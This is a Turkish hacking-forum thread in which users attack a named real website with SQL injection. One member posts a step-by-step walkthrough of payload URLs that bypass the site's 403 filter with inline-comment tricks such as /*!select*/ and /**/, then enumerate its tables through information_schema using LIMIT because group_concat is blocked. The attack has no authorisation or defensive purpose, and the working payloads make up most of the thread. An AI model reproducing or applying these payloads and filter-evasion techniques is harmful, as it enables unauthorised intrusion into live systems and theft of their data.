Sql İnjection 403 Forbidden Sorunu ?

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    bensiz_aglama
    bensiz_aglama's avatar
    Kayıt Tarihi: 23/Aralık/2009
    Erkek

    Merhaba arkadaşlar bir tane eskort site üzerinde sql denerken 403 forbidden olayı çıktı ama onu bypass yöntemi ile hallettim ama kolon sayısını yansıttığı zaman kolonların tablo isimlerini bulmaya çalışırken tekrardan aynı sorunu verdi acaba sorun nerde 

     

    http://massage-erotic-montreal.com/hostess.php?id=24+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- (NORMAL)

     

    http://massage-erotic-montreal.com/hostess.php?id=-24+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- (SAYILARI GÖSTERDİ)

     

    http://massage-erotic-montreal.com/hostess.php?id=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- (403 FORBİDDEN)

     

    http://massage-erotic-montreal.com/hostess.php?id=-24+union+/*!select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- (BYPASS)

     

    bundan sonra kolonları yazınca nedense yeniden 403 olayını vuruyor acaba nerede bir yanlışım var ?

     

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Twitter
    Twitter's avatar
    Kayıt Tarihi: 13/Ekim/2007
    Erkek
    hex veya char kullan

    Part Time Engineer, Full Time Dreamer ..
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Kazekage
    Kazekage's avatar
    Kayıt Tarihi: 28/Ekim/2010
    Erkek

    Hocam hex kullan ben genelde hexle hallediyordum hex(unhex().

    uğraşmayalı baya oldu ama bi dene

  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    bensiz_aglama
    bensiz_aglama's avatar
    Kayıt Tarihi: 23/Aralık/2009
    Erkek

    yok hocam hex yemedi char olayıda olmadı acaba hex ile char dökümanlarını varsa paylsabilirmisiniz.

  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Allura
    Allura's avatar
    Kayıt Tarihi: 17/Mayıs/2009
    Erkek

    hex değilde sex sitesi mi burası sdjfasld montreale gidicem bir ay sonra  kullanabilirim burayı dursun :)


    "
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Twitter
    Twitter's avatar
    Kayıt Tarihi: 13/Ekim/2007
    Erkek

    Hocam başka bir konu açıcaktım sırf bu vereceğim cevap için :) (yapabilirimde yeni taktikler için ) 

    İnan sabahtan beri uğraşıyorum 2 saat oldu bypass edene kadar canım çıktı 

    Amaç sizlerin öğrenmesi anlatayım şimdi 

     

    Sen sadece rakamları çıkarmayı halletmişsin gördümki tablo falan çekemiyorsun 

    Webmaster karakterleri filtrelemiş özellikle tables adını filtrelemiş bunu adım adım giderek farkettim 

    yani 

    http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 (sorun yok ) 

    http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+From (sorun yok ) 

    http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema (sorun yok )

    http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.table (görüyoruzki table de bile sorun yok ama )

     

    http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables ( yaptığımız an bum adminini filtresi devreye giriyor 403 forbidden çıktı ) 

     

    Filtreyi ise sırayla /**/ ile aştım yani 

    http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+From+/**/information_schema./**/tables/**/

     

    uyguladım gördükki sorunsuz açıldı +1 

    şimdi adam group_concat fonksiyonunuda kapatmış yani tabloları topluca alamıyoruz

     

    http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+From+/**/information_schema./**/tables/**/

    yapınca sorun yok chracter_Sets bilmem ne diye verdi ama bu tablo işe yaramaz group_concat ile alayını çekmek lazım fakat

    http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+From+/**/information_schema./**/tables/**/

    yapınca forbidden a düştük istesek buda aşılır ama ben limit yöntemi kullandım onu filtrelemeyi akıl etmemiş

     

    Limitli yöntem kullanınca göreceğizki sular seller gibi akacak

    http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+From+/**/information_schema./**/tables/**/+limit+1,1 

     

    http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+From+/**/information_schema./**/tables/**/+limit+2,1

    gibi sayıları artırarak sırayla çekebilirsiniz

    Artık bi zahmet kolonları falanda sen kas :) hep hazır bekleme 

    Herkese saygılar sevgiler


    Part Time Engineer, Full Time Dreamer ..
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SweetyVolty
    SweetyVolty's avatar
    Kayıt Tarihi: 12/Temmuz/2008
    Homo

    @Twitter:

    Hacı tunceliye gelince haber eyle, şöyle net çeken bir yerde,(tabiki üninin kantininde) biraz takılalım, ben yemek ısmarlarım sende sql injection gösterirsin :))


    Çok sıkılıyom
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    yawuz
    yawuz's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek

    karakter filitreleyince bu iş bitiyor mu?


    tahribat.com a can feda
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
Toplam Hit: 1863 Toplam Mesaj: 9